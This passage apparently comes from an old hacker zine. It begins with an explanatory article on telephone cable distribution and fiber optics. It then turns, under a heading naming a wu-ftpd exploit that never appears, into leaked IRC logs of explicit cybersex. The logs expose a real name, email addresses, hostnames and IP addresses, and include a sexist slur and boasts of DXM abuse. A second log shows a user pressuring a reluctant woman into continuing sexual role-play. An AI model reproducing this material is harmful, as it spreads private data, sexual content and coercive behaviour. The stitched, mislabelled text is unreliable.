Terminals are simply access points placed at convenient locations, on or between poles, along the cable route to permit connections to selected pairs in the cable. For example, a cable consisting of 100 pairs might have a terminal mounted on the pole to allow a technician access to pairs 1-25. The next terminal would allow access to pairs 24-40, and so on, until all the pairs have been used. In this manner, the pair assigned to each building, at the Central Switch, can be accessed at the closest terminal to that particular building. The individual buildings aerial "drop wire" is then connected to the pair in that terminal. Underground Cable The underground cable distribution system is very similar in design to the aerial cable system. I consider underground cable to be both, DIRECT BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS. As the title Direct Buried would indicate, the cable is placed into the ground, with no protection other than the inherent protection provided by the cable composition. Underground Conduit Systems for cable, are used to provide an out of sight cable system and to provide a means of adding to the existing cable as service demands increase. Underground Conduit Systems also provide protection for the cables since the cables are inside a pipe, which shields the cable. The Underground Cable Distribution System is configured similarly to the aerial cable, in that, cables leave a central point and continually branch out to smaller cables until all the buildings etc. have been accommodated. The Underground System is connected to buildings in basically two ways. PEDESTALS and ENCAPSULATION. Pedestals are simply terminals or access points where building cabling can be connected to the cable from the Central Switching Machine. There are many types, sizes, and shapes of pedestals in use today. The following diagram is a simplified depiction of the underground cable (drop wire) from a building premise, which has been buried, to a pedestal for connection. Encapsulation is when the buildings drop wire is permanently spliced into the underground distribution system. This system is preferred in situations where the visible pedestals are not appropriate, or possible. Fiber Optic Transmission Systems In the aerial and underground cable distribution systems looked at earlier, a pair of copper wires is used to carry the electrical signals generated by the transmitting buildings phone, to the switching machine, and then ultimately, to the receivers phone. The mouthpiece (transmitter) of the telephone converts the acoustic voice message into corresponding electrical signals. The electrical signals are passed onto the receiver's earpiece (receiver) where they are converted back to the original acoustic voice message. In certain cases now, it is becoming uneconomical to provide a pair of wires from every customer phone to the central switch. Transmitting speech and information via glass fibers instead of the conventional copper wire methods previously described is becoming increasingly popular in high traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and more prevalent in the communication industry. "FOTS" is the short term for Fiber Optics Transmission System. The development of FOTS technology has been increasing dramatically in recent years. The transmitting buildings phone still generates the same electrical signals, but the signals are used to turn a light source on and off. The light travels down the glass fibers where it is received and converted back to electrical impulses, which are connected to the receiving customers to wire copper pair. To get a perspective of the comparison of a pair of copper wires to a pair of glass fibers, consider the number of independent connections, which are possible on each type of system. * A pair of copper wires will provide two way communications for one conversation. * A pair of glass fibers can provide up to 8000 independent connections. The demands for more and more facilities to transmit and receive information is increasingly rapid. The cost and limitations of traditional means of linking areas together, is becoming more apparent. The normal cable distribution systems in use throughout the telephone industry employs combinations of underground, aerial, and FOTS distribution systems, to provide the most cost efficient, and effective means of providing service. There is your basic introduction to the telephone network or system. As my series of phone networks goes on I will go into greater detail and explain some of its more complex issues and attributes. Pabell pabell@comtech.ab.ca ------------------------------------------------------------------------------------------- el8 wu-ftpd overflow, by cossack and smiler ok back chrak he loves the simpsons too :\ [msg(asphxia)] im loaded HEH ill send u a 54 bill [msg(rachel_)] HEH for 5$ she will cybersex me [msg(rachel_)] im gonna log it so youre more like him than u thought :\ [msg(rachel_)] and [msg(rachel_)] let gummo see it HEH!! [rachel_(nobans@166-87-97.ipt.aol.com)] haha ummo wont believe u [rachel_(nobans@166-87-97.ipt.aol.com)] er gummo [msg(rachel_)] HEH [msg(asphxia)] HEH ok today!?!?!! [msg(asphxia)] HEH ??!?!!? [msg(asphxia)] HEH u better not turn out to be a man HGHEH! ùíù tip [tip@209.107.78.20] has joined #falon yo yo yo yo yo i'm gonna... DANCE ùíù tip [tip@209.107.78.20] has left #falon [] [msg(tip)] HEH im trying to get phone/cyber sex from phixes girlfriend HEH!!! [asphxia(bg0124a@216.76.138.90)] i am not a man [msg(tip)] she said if i mail her money she will so HEH. [msg(asphxia)] HEH ok [tip(tip@209.107.78.20)] HUH? ð asphxia lays down naked on your bed [msg(tip)] HEH shut up im getting laid ùíù Starting conversation with asphxia [tip(tip@209.107.78.20)] werd [msg(asphxia)] heh ok [msg(asphxia)] HEH hurry up im whacking off to pt0n HEH!! ð asphxia starts to play with her clirt [msg(asphxia)] pr0n! [asphxia(bg0124a@216.76.138.90)] -r [msg(asphxia)] HEH huh ? [msg(asphxia)] well [msg(asphxia)] lets hurry p im leavin in 40 minutes HEh and i wnna talk to someone on irc after u HEH! [asphxia(bg0124a@216.76.138.90)] ok [asphxia(bg0124a@216.76.138.90)] ok ð asphxia starts to rub her clit harder [msg(asphxia)] oHEH r u like fingering urself or some shit HEH ? ð asphxia sucks on the head of your dick ð asphxia puts her fingers in to her wet pussy [msg(asphxia)] HEH ur not seriously doing that r u HEH ? [msg(asphxia)] HEH ok [msg(asphxia)] keep tyalking!! HEH ð -> chrak/asphxia HEH me starts liek uNFIng u HH! [msg(asphxia)] HEH!@!! ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) [msg(asphxia)] HEH helloo HEH !! [msg(asphxia)] u cant just start and stop HEH!! [msg(asphxia)] it sux like that!!! [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a] [msg(rachel)] HEH omg [msg(rachel_)] HEH omg [msg(rachel_)] she stopped cybering me for no reason HEH!! [msg(rachel_)] HEH [msg(rachel_)] unless she is really doing the shit she is saying shes doing HEH! ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | chrak (sean@cpwright.com) (Internic Commercial) ³ ircname : Sean Harny | channels : #b4b0 #dr00gz @#falon ³ server : irc.cs.cmu.edu (calloc(1,sizeof(geek))) : idle : 0 hours 0 mins 39 secs (signon: Tue Feb 23 14:35:33 1999) [ctcp(asphxia)] PING ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) ùíù [#h] Bad channel key ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) [ctcp(asphxia)] PING HEh her server is like dying or some shit HEH [ctcp(asphxia)] PING [ctcp(asphxia)] PING [ctcp(#falon)] PING ùíù Ignorance List: [ 1] #b4b0: ALL ùíù chrak [sean@cpwright.com] has joined #phrack ùíù Topic for #phrack: shoe. ùíù topic set by apropos [Tue Feb 23 01:04:13 1999] ùíù [Users(#phrack:65)] [ chrak ] [ fail ] [@hmf ] [ simpleton ] [ RedRasta ] [@loadammo ] [ b0n3r ] [ gweeds ] [ fungus ] [ awr ] [ [JFK] ] [ batz ] [ tyme ] [ ecx ] [ emoz ] [ _jcd ] [@eb_ ] [@vis10n ] [ kaotik ] [ g00ey ] [ F0uRier ] [ fiji ] [@angstrom ] [ Victoria ] [@sw1tchg0d ] [ infecti0n ] [ spinux ] [ zach ] [@d-low ] [ cripto ] [ interline ] [ dreck_ ] [@soyl3nt ] [@miph ] [@par ] [@plaguez ] [@halflife ] [ yewdeepee ] [ shift4 ] [@ARP_H ] [@b_ ] [ Kludge ] [@fah_ ] [@cain ] [ apathy ] [@lanfear ] [ hi_ ] [ Neural_ ] [ thwack ] [ i87 ] [@route ] [@apropos ] [@soylent ] [@bovine ] [@p-wInd0Wz ] [@kamee ] [ neurostim ] [ krnl ] [ kweiheri ] [ meenk ] [@ikol ] [@syke ] [ enr1que ] [@nihilis ] [ theclerk ] ùíù [Users(#phrack:13)] [@sirsyko ] [ falken ] [@rogerb ] [ snowman ] [ fx ] [@felix ] [ nocarrier ] [ chris ] [@FrontLine ] [ gaius_ ] [@kiad ] [@tmcm ] [@silitek ] ùíù Channel #phrack was created at Sat Jul 18 08:25:57 1998 ùíù BitchX: Join to #phrack was synced in 0.292 secs!! ùíù chrak [sean@cpwright.com] has left #phrack [] ùíù chrak [sean@cpwright.com] has joined #chat ùíù Topic for #chat: le porc frangais indique que vous joindrez mes ligions ùíù topic set by Chewbacca [Tue Feb 23 15:19:08 1999] ùíù [Users(#chat:28)] [ chrak ] [ zahr ] [ skibum1 ] [ RuFfrYdEr ] [ Luvman ] [ billisray ] [ iibmoz ] [ FireLord ] [ uberpig ] [@PartyDr ] [@ssmile ] [ Poisoned ] [ kasper ] [ Cochise ] [@Wildcard ] [ Sigma2000 ] [@Gobo ] [@Porthos ] [ Zooj ] [@Fedaykin ] [@Chewbacca ] [ `cat ] [ Hrunting ] [@shinsei ] [@Babylon ] [@Athos ] [@Aramis ] [@Lao-Tzu ] ùíù Channel #chat was created at Wed Feb 3 12:44:48 1999 ùíù BitchX: Join to #chat was synced in 0.176 secs!! [msg(asphxia)] HEH ùíù chrak [sean@cpwright.com] has left #chat [] ùíù Ignorance List: [ 1] #b4b0: ALL ùíù Connecting to port 6667 of server irc.prison.net [refnum 12] !irc.prison.net Looking up your hostname... !irc.prison.net Checking Ident !irc.prison.net Got Ident response !irc.prison.net Found your hostname ùíù Your nick [chrak] is owned by sean@cpwright.com ùíù BitchX: For more information about BitchX type /about ùíù Welcome to the Internet Relay Network chrak_ ùíù Your host is irc.Prison.NET[irc], running version 2.8.21+RF+CSr30 ùíù This server was created Mon Nov 23 1998 at 10 29:13 PST ùíù irc.Prison.NET 2.8.21+RF+CSr30 oiwsfcukbdl biklmnopstv ùíù [local users on irc(796)] 2% ùíù [global users on irc(5575)] 12% ùíù [invisible users on irc(40720)] 88% ùíù [ircops on irc(187)] 0% ùíù [total users on irc(46295)] ùíù [unknown connections(0)] ùíù [total servers on irc(45)] (avg. 1028 users per server) ùíù [total channels created(19156)] (avg. 2 users per channel) ùíù [Highest client connection count(1452) (1451)] ùíù Mode change [+iw] for user chrak_ ùíù Topic for #b4b0: r4lph has quit b4b0. I've massd'd the place to commemorate his fine service. ùíù topic set by Stoner [Mon Feb 22 17:49:36 1999] ùíù [Users(#b4b0:23)] [ chrak_ ] [ raychel- ] [ Oroku ] [ MostHateD ] [ rachel_ ] [ chrak ] [ Deads0u| ] [ m0f0 ] [ F0uRier ] [ ne0h ] [ pahrohfit ] [ e- ] [ espionage ] [vz0rt ] [ zayten ] [ bluetip ] [vb4b0 ] [ gb ] [ malloc- ] [ liquidhex ] [ sadjester ] [ gob ] [ tip ] ùíù chrak_ [~hmm@cpwright.com] has joined #dr00gz ùíù [Users(#dr00gz:5)] [ chrak_ ] [ chrak ] [@PHiNG ] [ liquidhex ] [@irrupt ] ùíù chrak_ [~hmm@cpwright.com] has joined #falon ùíù [Users(#falon:6)] [ chrak_ ] [ raychel- ] [@rachel_ ] [@chrak ] [@Falon ] [@liquidhex ] ùíù Channel #b4b0 was created at Mon Jan 25 17:26:24 1999 ùíù BitchX: Join to #b4b0 was synced in 9.500 secs!! ùíù Channel #dr00gz was created at Sun Feb 21 19:35:58 1999 ùíù BitchX: Join to #dr00gz was synced in 15.124 secs!! ùíù Channel #falon was created at Tue Feb 23 07:24:25 1999 [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] ùíù BitchX: Join to #falon was synced in 21.486 secs!! [msg(asphxia)] HEH ok chrak it happened to me too :\ ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) hey do0d ùíù SignOff rachel_: #falon (Ping timeout: 240 seconds) [msg(asphxia)] msg me plz HEH [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] [msg(asphxia)] ok [asphxia(bg0124a@216.76.138.90)] nm [msg(asphxia)] hehe [msg(asphxia)] heh [asphxia(bg0124a@216.76.138.90)] deal is off [msg(asphxia)] huh ?? [Falon(~Falon@x2-11.cosmoaccess.net)] hey [msg(asphxia)] huh ? [msg(asphxia)] HEH!! [msg(asphxia)] why HEH ? [msg(falon)] hi ùíù Ending conversation with asphxia OMG she just said 'deal is off' fucking [msg(asphxia)] HEH the server died HEH!!!!! [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] fucki ng ahahaha [msg(asphxia)] HEH damnbitch slut ùíù You're not opped on #falon EH HEh BAN asphxia i dont need [msg(asphixa)] HEH!! asphixa: No such nick/channel she said [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] HEH [msg(asphxia)] HEH she said she would cyber me and wastes like 20 mniutes of my tyime HEh its not like its sex HEH! where she haz a right to say no HEH. if i agree that iz HEH [asphxia(bg0124a@216.76.138.90)] hey ð asphxia licks your inner thigh [msg(asphxia)] HEH Werd up ? HEh ohh nm hahah she startsed agian HEH ùíù Starting conversation with asphxia hehe ok [msg(asphxia)] heh ð -> chrak_/asphxia likes ur outer pussy lips HEH [Falon(~Falon@x2-11.cosmoaccess.net)] hmm [asphxia(bg0124a@216.76.138.90)] mmmmm ð asphxia fingers her pussy [Falon(~Falon@x2-11.cosmoaccess.net)] you are really strange [asphxia(bg0124a@216.76.138.90)] mmmm [msg(asphxia)] HEH r u really getting off HEH [msg(asphxia)] HEH there ð -> chrak_/asphxia resumes whacking off HEh continue talking plz HEH! ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #Dr00gz got rid of a few potential hazards fer ya too HEH! rpc. daemons erm wrong damn channel i must go I've done like 8 math assignments today BABY HEH! [msg(raychel-)] HEH by bye! [raychel-(nobans@171-170-154.ipt.aol.com)] bye :D [raychel-(nobans@171-170-154.ipt.aol.com)] ill bbi like 30 [msg(asphxia)] HEH [raychel-(nobans@171-170-154.ipt.aol.com)] i just hafta make a call LD [raychel-(nobans@171-170-154.ipt.aol.com)] er :D [msg(raychel-)] HEH ok damn asphxia sux at this shes slooooow typer HEH [msg(asphxia)] HEH r u just [msg(asphxia)] doing this [raychel-(nobans@171-170-154.ipt.aol.com)] hahha [raychel-(nobans@171-170-154.ipt.aol.com)] ok [msg(asphxia)] to piss me off HEHEH!! [msg(asphxia)] like [msg(asphxia)] HEH. [raychel-(nobans@171-170-154.ipt.aol.com)] later ùíù SignOff raychel-: #falon (Giving in won't stop the noise.) [msg(asphxia)] start making me whack off [msg(asphxia)] then [msg(asphxia)] stop [msg(asphxia)] talking HEH! [msg(asphxia)] HEH me [msg(asphxia)] begins [msg(asphxia)] to ð asphxia strokes her pussy with one hand and your phat cock [asphxia(bg0124a@216.76.138.90)] with the other ùíù mode/#falon [+o chrak_] by Falon ð -> chrak_/asphxia moans HEH ð asphxia wants you to put your hand in her pussy [asphxia(bg0124a@216.76.138.90)] shit ph1x is on ð -> chrak_/asphxia puts his hand ALL the way up there HEH! ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon ð asphxia still wants you though HEH!@#$ ð asphxia starts to get wet [msg(asphxia)] HEH ok ignore him HEH!! chrak ùíù ph1x [sickmade@01-029.009.popsite.net] has left #falon [] [msg(ph1x)] wait like 5 minutes ok HEH ? [ph1x(sickmade@01-029.009.popsite.net)] HEH [ph1x(sickmade@01-029.009.popsite.net)] FOR WHAT? [ph1x(sickmade@01-029.009.popsite.net)] HEH! [ph1x(sickmade@01-029.009.popsite.net)] asphxia my women is on [ph1x(sickmade@01-029.009.popsite.net)] HEH! [msg(asphxia)] HEH jsut ms me shit HEH cause im whacking off [ph1x(sickmade@01-029.009.popsite.net)] HEH!@#$ [ph1x(sickmade@01-029.009.popsite.net)] HEHAHHEHAH [msg(asphxia)] HEH ph1x is here yes HEH hurry up HEH! [msg(asphxia)] im looking at pr0n so it wont take long HEH if i hurry ð asphxia licks the head of your dick [asphxia(bg0124a@216.76.138.90)] mmmmmmm [asphxia(bg0124a@216.76.138.90)] put it in me ð -> chrak_/ashxia puts it in u ashxia: No such nick/channel ð -> chrak_/asphxia puts it in u [asphxia(bg0124a@216.76.138.90)] mmm ð asphxia squeals [asphxia(bg0124a@216.76.138.90)] it feels sooo good ð -> chrak_/asphxia IZ APPROCHING ORGASM FROM THIS STUPID EXCUSE FOR SEX HEH@!@A!@ ùíù NetSplit: irc-e.frontiernet.net split from irc.exodus.net [03:37pm] ùíù BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc-e.frontiernet.net] [asphxia(bg0124a@216.76.138.90)] mmmmmm ð asphxia rides your big cock [asphxia(bg0124a@216.76.138.90)] ohhh [asphxia(bg0124a@216.76.138.90)] you feel how wet i am [msg(asphxia)] HEH yep ùíù SignOff ph1x: #dr00gz (Leaving) [asphxia(bg0124a@216.76.138.90)] mmmmm] ð asphxia purrs [asphxia(bg0124a@216.76.138.90)] fuck me hard [asphxia(bg0124a@216.76.138.90)] i want to feel you cum [msg(asphxia)] heh i am HEH [msg(asphxia)] im whacking off HEH!!! [asphxia(bg0124a@216.76.138.90)] you are? [msg(asphxia)] HEH YEP [msg(asphxia)] well [msg(asphxia)] ok [msg(asphxia)] HEH ð asphxia wants to feel you cum all inside her [msg(asphxia)] im fucking u HEH! [asphxia(bg0124a@216.76.138.90)] oooooh [msg(asphxia)] EHEH ok her we go [asphxia(bg0124a@216.76.138.90)] fuck me harder ð asphxia squeals ð asphxia turns over and inserts your cock into her tight ass ùíù asphxia [bg0124a@216.76.138.90] has joined #dr00gz [msg(asphxia)] hehe [msg(asphxia)] ok im almost cumming HEH hiya [msg(asphxia)] just type some more shit HEh [msg(asphxia)] and say [msg(asphxia)] 'ohh chrak HEH' [msg(asphxia)] like moan it HEH!!!! ùíù SignOff liquidhex: #dr00gz,#falon (Ping timeout) [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] ùíù BitchX: Ambiguous command: F [msg(asphxia)] f ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #dr00gz ³ server : irc.emory.edu ([170.140.4.6] Emory University) ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon [asphxia(bg0124a@216.76.138.90)] ohhh crack HEH ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #dr00gz [asphxia(bg0124a@216.76.138.90)] fuck me harded [msg(asphxia)] heh [msg(asphxia)] ij [asphxia(bg0124a@216.76.138.90)] your cock feels sooo good in my asss [asphxia(bg0124a@216.76.138.90)] mmmm hmMmmmm [msg(asphxia)] ur ass is about to get like [msg(asphxia)] filled up with cum HEH@ [msg(asphxia)] !! ð asphxia rubs her clit [asphxia(bg0124a@216.76.138.90)] yum ð asphxia cannot wait [msg(asphxia)] HEH keep talikng im almost done HEH!!! [msg(asphxia)] HEH keep talikng im almost done HEH!!! [msg(asphxia)] HEH keep talikng im almost done HEH!!! ð asphxia rides your phat cock [asphxia(bg0124a@216.76.138.90)] mmmmm [asphxia(bg0124a@216.76.138.90)] fuck me hard ð asphxia puts a hand inside her hot pussy [asphxia(bg0124a@216.76.138.90)] i want to feel you come [msg(asphxia)] HEH ð -> chrak_/asphxia pinching ur nipz HEH!@ [asphxia(bg0124a@216.76.138.90)] uuum 3:45pm up 4 days, 2:28, 3 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT descende ttyp3 ron-ny13-22.ix.n 3:28pm 9:27 0.16s 0.16s -bash sean ttya1 dialup28:S.0 2:38pm 0.00s 8.86s 8.86s BitchX chrak cpwright ttyp1 sls17.asb.com 3:28pm 1:09 0.38s 0.05s talk sean [asphxia(bg0124a@216.76.138.90)] don't sto[ [asphxia(bg0124a@216.76.138.90)] p [msg(asphxia)] heh [msg(asphxia)] no u dont stop HEH im the on whacking off HEH!! ð -> chrak_/asphxia places it in ur mouth HEH. anyone hERE? ð -> chrak_/asphxia wants a BJ HEH!!! ball sucking to oHEH!! wakeup asphxia [msg(ph1x)] hold on 5 minutes HEH! [ph1x(sickmade@01-029.009.popsite.net)] HEH ð asphxia rubs her tongue up and down your throbbing dick [ph1x(sickmade@01-029.009.popsite.net)] are you whacking off? [asphxia(bg0124a@216.76.138.90)] mmmm nope.. noone here ùíù mode/#dr00gz [+o ph1x] by irrupt ùíù mode/#dr00gz [+oo chrak_ asphxia] by ph1x chrak is whacking off HEH [msg(asphxia)] heh haha he keeps msg'ng me to holdon 5 mins shut up i am not HEH! [asphxia(bg0124a@216.76.138.90)] mmmm ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : @#dr00gz ³ server : irc.emory.edu ([170.140.4.6] Emory University) ð asphxia sucks it hard um [asphxia(bg0124a@216.76.138.90)] in HEH [asphxia(bg0124a@216.76.138.90)] out yes you are [asphxia(bg0124a@216.76.138.90)] in out [msg(asphxia)] herhh [msg(asphxia)] ok du0d [msg(asphxia)] suck ma balsl HEH! yesterday was the worst trip i've ever had on dxm it sucked HEH! listen to this My mom was bitching me out calling me a robo junkie because I told her I drank a shitload of robotussn when infact I really took a bunch of pure dxm and I got really pissed off and punched a huge hole in the wall HEH! down by the stairs and I didnt even feel it ð asphxia wraps her mouth around your balls and sucks on them because dxm makes your body like numb' HEH! [msg(asphxia)] suck ma balsl HEH! I could have like karate chopped through metal [msg(asphxia)] HEH ok ph1x [msg(asphxia)] HEH ok im about to like jizz atnd shti HE Hkeep sucking ! yes? ð asphxia sucks them hard ð asphxia wraps her hand around your cock hiya bebe I can't beleive I actually thought I could act normal in front of my parents on 800mg HEH! [asphxia(bg0124a@216.76.138.90)] mmmmmmm HELLO BREE hi bebe kiss [msg(asphxia)] ok * >ph1x #dr00gz strips dravyn naked and gets out his whip and handcuffs [msg(asphxia)] hurry im hgonna finnish in like 30 seconds HEH HEH [msg(asphxia)] so keep typing HEH! you ready for an orgy of pain? ð asphxia pulls on your phat cock [asphxia(bg0124a@216.76.138.90)] mmmmm [asphxia(bg0124a@216.76.138.90)] feels so good [asphxia(bg0124a@216.76.138.90)] i want to feel you cum [asphxia(bg0124a@216.76.138.90)] baby [asphxia(bg0124a@216.76.138.90)] heh HEH!? yes [msg(asphxia)] HEH ALMOST from you always Do you like bondage? [msg(asphxia)] GWG me niot phix HEH! [msg(asphxia)] its annoying to stop and start HEH!! ð asphxia wants you to come baby [asphxia(bg0124a@216.76.138.90)] mmmm ùíù mode/#falon [+o ph1x] by Falon [asphxia(bg0124a@216.76.138.90)] ohhhh [asphxia(bg0124a@216.76.138.90)] want to fuck [asphxia(bg0124a@216.76.138.90)] again [msg(asphxia)] HEH Ok ð asphxia puts your hot dick into her wet pussy [asphxia(bg0124a@216.76.138.90)] fuck me [msg(asphxia)] type fast HEH for like one minute HEH and then il lbe done HEH ð -> chrak_/asphxia starts pushing it in and out yeah [msg(asphxia)] HEH ur nort getting off to this too r u HEH . [msg(asphxia)] this works great with pr0n in front of u too HEH! ð asphxia fucks you hard ð -> chrak_/asphxia starts pushing it in and out ð -> chrak_/asphxia HE Halmost done hurry up and fuck HEH!! ð asphxia sucks onyour nipples [asphxia(bg0124a@216.76.138.90)] mmmmm ð asphxia 's muscles tighten [asphxia(bg0124a@216.76.138.90)] i am gonna cum [asphxia(bg0124a@216.76.138.90)] babe [msg(asphxia)] HEH good ð -> chrak_/asphxia me feels her puss contracting on his cock [msg(asphxia)] HEH type [msg(asphxia)] im looking at this like life size pic [msg(asphxia)] of [asphxia(bg0124a@216.76.138.90)] mmmmmmmmmm [msg(asphxia)] a woman cumming HEH! DMANIT HEH ð asphxia hope syou cummmmm join #hackerz asphxia HEH!@#$ [asphxia(bg0124a@216.76.138.90)] i am about to ð asphxia rams your cock into her wetpussy [asphxia(bg0124a@216.76.138.90)] oh baby ð -> chrak_/asphxia begins the final uhm HEH decent into pussy fuck land HEH! [asphxia(bg0124a@216.76.138.90)] harder4 [asphxia(bg0124a@216.76.138.90)] it feels too good ð asphxia moans [msg(asphxia)] HEH discribe ur pussy HEH! [msg(asphxia)] HEH almsot done HEH! [asphxia(bg0124a@216.76.138.90)] it is wet [asphxia(bg0124a@216.76.138.90)] and really deep [asphxia(bg0124a@216.76.138.90)] and filled up with your hot cock [asphxia(bg0124a@216.76.138.90)] mmm [msg(asphxia)] HEH ok [msg(asphxia)] im all done HEH! [asphxia(bg0124a@216.76.138.90)] oh [asphxia(bg0124a@216.76.138.90)] yes [asphxia(bg0124a@216.76.138.90)] harder [msg(asphxia)] HEH almsot done HEH! [msg(asphxia)] HEH [msg(asphxia)] all doe HEH [msg(asphxia)] u can help clean up my damn hand and pantz tho HEH! [asphxia(bg0124a@216.76.138.90)] mmmmmmmmmmmmm [msg(asphxia)] HEH [msg(asphxia)] ok [msg(asphxia)] danke HEH. [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@ph1x ][sickmade@01-029.009.popsite.net ] [n/a] [msg(ph1x)] HEH hi [ph1x(sickmade@01-029.009.popsite.net)] hi [msg(ph1x)] HEH r u talking to asphxia ? ...........................LOG ON [ph1x(sickmade@01-029.009.popsite.net)] YeZ ùíù intruderx [haxor@al8-p56-zg.tel.hr] has joined #dr00gz [msg(ph1x)] ohh. ùíù mode/#dr00gz [+o intruderx] by ph1x [msg(ph1x)] HHE abpit what ? OK hi IRC log ended Tue Feb 23 16:01:19 1999 ------------------------------------------------------------------------------- HEH zero d4y. no d1str0. i could describe how i usually give head, if and when i do do it then. just using /me g0d im going to be here all night. if that would work well? haha if you keep complaining, you can just /part you know.. no we have an agreement. you are getting lag bursts again and why do i have to use /me ? because well you don't /me just makes it all better i guess. what if i don't want to use /me? hm then don't just get to the cybering this is weird :\ i'll just describe how i gave my ex head, i guess k. i used to kinda suprise him, and when he was sitting in his chair talking on IRC, I would unzip his pants and kinda kneel between his legs I DON'T WANNA DO THIS THIS IS GAY you have to. du0d and you can't tell a fucking story :\ wtf i wasn't done you gotta describe it like u were doing it to me jesus why? i'm not doing it to you tahtz what cyber head is tahtz what cyber head is tahtz what cyber head is i haven't done it to you and i prolly won't even ever meet you du0d sigh will u just do it fine :\ use /me or something but make it sound like erotic i hate you. :\ HEH oh well. your end of the bargain. I didn't even agree i said i would think about it wtf you said "FINE" meaning "ok i will" meaning "yes" making it an affirmation of your agreement. OK now do it WHATEVER fucking op everyone you deopped ð sek kneels between your legs and unzips your pants yeah ð sek pulls out your dick and starts to play with it keep going... .. ð sek licks the very tip of it, and runs her tongue down to the very bottom jea. ð sek sucks a little on the head of your dick ð sek begins to move her mouth up and down slowly, deepthroating ð sek starts to move a little faster word. ð sek waits until you cum in her mouth, then pulls back and swallows there, happy? :\ no keep going SIGH im not a minute man! why not? i'm done :\ um ur done when like i say ur done there is only so much you can describe over irc thats the way it works heh u can get more descriptive think of new creative ways before i lose th1z m4ss1ve er3ct10n sigh er, you got hard from that? no. thasts the problem!@#$ i should get hard from that hahah now then start g1bing head eep, my bf just got on irc future bf, anyways :P i dont care this chan is +s now then. hm i do, i'm talking to him :\ well just give me some more cyber head and dont tell h1m or if u wish ill tell him HEH. i dont care. i thought i did a decent job of giving head over irc :\ u gotta finish your part of the agreement. you did but ur not done yet. you don't even know who he is well how much more can i say? just keep talking about u giving me head using /me and get real descriptive about it and dont finish till i say its done jeesh i dunno how much more i can say :\ i like to deepthroat just start over and instead of finishing sigh keep going how hard iz that. hEh. I have no clue what to say though! make stuff up as u go along. like ab0ut my long koq and stuff hEH! haha i dunno if its that long though ;) yeah well just start over and keep going and ill um cheer u on from 'above' heh3ha hahaha, my future-bf just called you a "fuqn wanker" bwahaha heh. well fuqn start! u gotta finish ur end of the deal jesus chr1st. fine ð sek sighs i did i 